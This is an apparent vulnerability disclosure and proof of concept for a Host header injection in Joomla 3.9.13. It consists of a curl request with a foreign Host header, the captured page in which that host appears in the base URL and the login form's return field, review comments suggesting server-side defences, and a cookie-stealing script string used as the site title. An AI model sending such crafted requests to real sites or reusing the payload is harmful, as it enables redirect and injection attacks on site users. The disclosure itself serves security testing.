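Joomla version 3.9.13 suffers from a host header injection vulnerability: the Host header supplied by the client is reflected into URLs that the application generates in its response.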
8346eed555e87022e9f2c87ca2cd63d9
# Exploit Title: Joomla 3.9.13 - 'Host' Header Injection
# Author: Pablo Santiago
# Date: 2019-11-12
# Vendor Homepage: https://www.joomla.org/
# Source: https://downloads.joomla.org/cms/joomla3/3-9-13/Joomla_3-9-13-Stable-Full_Package.zip?format=zip
# Version: 3.9.13
# CVE : N/A
# Tested on: Windows 10
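# PoC: request the local site with a Host header naming a different host. In the response below, the supplied host appears in <base href> and, base64-encoded, in the hidden "return" field of the login form.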
curl http://localhost/joomla/ -H "Host: exploit-db.com"
<!DOCTYPE html>
<html lang="en-gb" dir="ltr">
<head>
<!-- NOTE(review): head of the page returned for the request that carried the foreign Host header; captured output, markup unchanged. -->
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta charset="utf-8" />
<!-- NOTE(review): the host in this base URL is the value of the request's Host header, not the
     address the request was sent to (localhost). A browser resolves relative and root-relative
     URLs in the document, including the /joomla/... stylesheets and scripts below, against this base.
     Defence: have the web server answer only for the site's known host names (a default virtual
     host that rejects anything else). Joomla's $live_site setting in configuration.php presumably
     pins the generated base URL as well; confirm for this version. -->
<base href="http://exploit-db.com/joomla/" />
<!-- NOTE(review): the same string is shown as the site title in the page header and footer, so it is
     presumably text configured on the test site rather than a value taken from the Host header. -->
<meta name="description" content="javacript:alert(document.cookie)" />
<meta name="generator" content="Joomla! - Open Source Content
Management" />
<title>Home</title>
<link href="/joomla/index.php?format=feed&type=rss"
rel="alternate" type="application/rss+xml" title="RSS 2.0" />
<link href="/joomla/index.php?format=feed&type=atom"
rel="alternate" type="application/atom+xml" title="Atom 1.0" />
<link href="/joomla/templates/protostar/favicon.ico"
rel="shortcut icon" type="image/vnd.microsoft.icon" />
<link href="/joomla/templates/protostar/css/template.css?190197408a83fd286a9c42640a0f2f22"
rel="stylesheet" />
<link href="https://fonts.googleapis.com/css?family=Open+Sans"
rel="stylesheet" />
<style>
h1, h2, h3, h4, h5, h6, .site-title {
font-family: 'Open Sans', sans-serif;
}
</style>
<script type="application/json" class="joomla-script-options
new">{"csrf.token":"d460ac322fbbb6ae67cc78034182d9e1","system.paths":{"root":"\/joomla","base":"\/joomla"},"system.keepalive":{"interval":840000,"uri":"\/joomla\/index.php\/component\/ajax\/?format=json"}}</script>
<script
src="/joomla/media/jui/js/jquery.min.js?190197408a83fd286a9c42640a0f2f22"></script>
<script
src="/joomla/media/jui/js/jquery-noconflict.js?190197408a83fd286a9c42640a0f2f22"></script>
<script
src="/joomla/media/jui/js/jquery-migrate.min.js?190197408a83fd286a9c42640a0f2f22"></script>
<script
src="/joomla/media/system/js/caption.js?190197408a83fd286a9c42640a0f2f22"></script>
<script
src="/joomla/media/jui/js/bootstrap.min.js?190197408a83fd286a9c42640a0f2f22"></script>
<script
src="/joomla/templates/protostar/js/template.js?190197408a83fd286a9c42640a0f2f22"></script>
<!--[if lt IE 9]><script
src="/joomla/media/jui/js/html5.js?190197408a83fd286a9c42640a0f2f22"></script><![endif]-->
<script
src="/joomla/media/system/js/core.js?190197408a83fd286a9c42640a0f2f22"></script>
<!--[if lt IE 9]><script
src="/joomla/media/system/js/polyfill.event.js?190197408a83fd286a9c42640a0f2f22"></script><![endif]-->
<script
src="/joomla/media/system/js/keepalive.js?190197408a83fd286a9c42640a0f2f22"></script>
<script>
jQuery(window).on('load', function() {
new JCaption('img.caption');
jQuery(function($){ initTooltips(); $("body").on("subform-row-add",
initTooltips); function initTooltips (event, container) { container =
container || document;$(container).find(".hasTooltip").tooltip({"html":
true,"container": "body"});} });
</script>
</head>
<body class="site com_content view-featured no-layout no-task itemid-101">
<!-- NOTE(review): body of the same captured response; markup unchanged. The links and the form action
     in it are root-relative (/joomla/...), so the supplied host is not visible in them directly. -->
<!-- Body -->
<div class="body" id="top">
<div class="container">
<!-- Header -->
<header class="header" role="banner">
<div class="header-inner clearfix">
<a class="brand pull-left"
href="/joomla/">
<!-- NOTE(review): site title text; the same string is in the meta description and the footer, so it is
     presumably the test site's configured name and not a value taken from the Host header. -->
<span
class="site-title"
title="javacript:alert(document.cookie)">javacript:alert(document.cookie)</span>
</a>
<div class="header-search pull-right">
</div>
</div>
</header>
<div class="row-fluid">
<main
id="content" role="main" class="span9">
<!-- Begin Content -->
<div id="system-message-container">
</div>
<div class="blog-featured"
itemscope itemtype="https://schema.org/Blog">
<div class="page-header">
<h1>
Home </h1>
</div>
</div>
<div class="clearfix"></div>
<div aria-label="breadcrumbs"
role="navigation">
<ul itemscope itemtype="https://schema.org/BreadcrumbList"
class="breadcrumb">
<li>
You are here:
</li>
<li
itemprop="itemListElement" itemscope
itemtype="https://schema.org/ListItem" class="active">
<span itemprop="name">
Home
</span>
<meta itemprop="position" content="1">
</li>
</ul>
</div>
<!-- End Content -->
</main>
<div id="aside" class="span3">
<!-- Begin Right Sidebar -->
<div class="well
_menu"><h3 class="page-header">Main Menu</h3><ul class="nav menu
mod-list">
<li class="item-101 default current active"><a
href="/joomla/index.php" >Home</a></li></ul>
</div><div class="well "><h3 class="page-header">Login Form</h3><form
action="/joomla/index.php" method="post" id="login-form"
class="form-inline">
<div class="userdata">
<div id="form-login-username" class="control-group">
<div class="controls">
<div class="input-prepend">
<span class="add-on">
<span
class="icon-user hasTooltip" title="Username"></span>
<label
for="modlgn-username" class="element-invisible">Username</label>
</span>
<input
id="modlgn-username" type="text" name="username" class="input-small"
tabindex="0" size="18" placeholder="Username" />
</div>
</div>
</div>
<div id="form-login-password" class="control-group">
<div class="controls">
<div class="input-prepend">
<span class="add-on">
<span
class="icon-lock hasTooltip" title="Password">
</span>
<label
for="modlgn-passwd" class="element-invisible">Password
</label>
</span>
<input
id="modlgn-passwd" type="password" name="password" class="input-small"
tabindex="0" size="18" placeholder="Password" />
</div>
</div>
</div>
<div
id="form-login-remember" class="control-group checkbox">
<label for="modlgn-remember"
class="control-label">Remember Me</label> <input id="modlgn-remember"
type="checkbox" name="remember" class="inputbox" value="yes"/>
</div>
<div id="form-login-submit"
class="control-group">
<div class="controls">
<button type="submit" tabindex="0"
name="Submit" class="btn btn-primary login-button">Log in</button>
</div>
</div>
<ul class="unstyled">
<li>
<a
href="/joomla/index.php/component/users/?view=remind&Itemid=101">
Forgot your username?</a>
</li>
<li>
<a
href="/joomla/index.php/component/users/?view=reset&Itemid=101">
Forgot your password?</a>
</li>
</ul>
<input type="hidden" name="option" value="com_users" />
<input type="hidden" name="task" value="user.login" />
<!-- NOTE(review): this value is base64 for "http://exploit-db.com/joomla/", so the host from the request's
     Host header also ends up in the login form's return target. Whether the application follows that
     target after login is not shown in this capture. -->
<input type="hidden" name="return"
value="aHR0cDovL2V4cGxvaXQtZGIuY29tL2pvb21sYS8=" />
<input type="hidden"
name="d460ac322fbbb6ae67cc78034182d9e1" value="1" /> </div>
</form>
</div>
<!-- End Right Sidebar -->
</div>
</div>
</div>
</div>
<!-- Footer -->
<footer class="footer" role="contentinfo">
<div class="container">
<hr />
<p class="pull-right">
<a href="#top" id="back-top">
Back to Top
</a>
</p>
<p>
© 2019
javacript:alert(document.cookie) </p>
</div>
</footer>
</body>
</html>
#PoC Visual
https://imgur.com/a/IgO4ZxI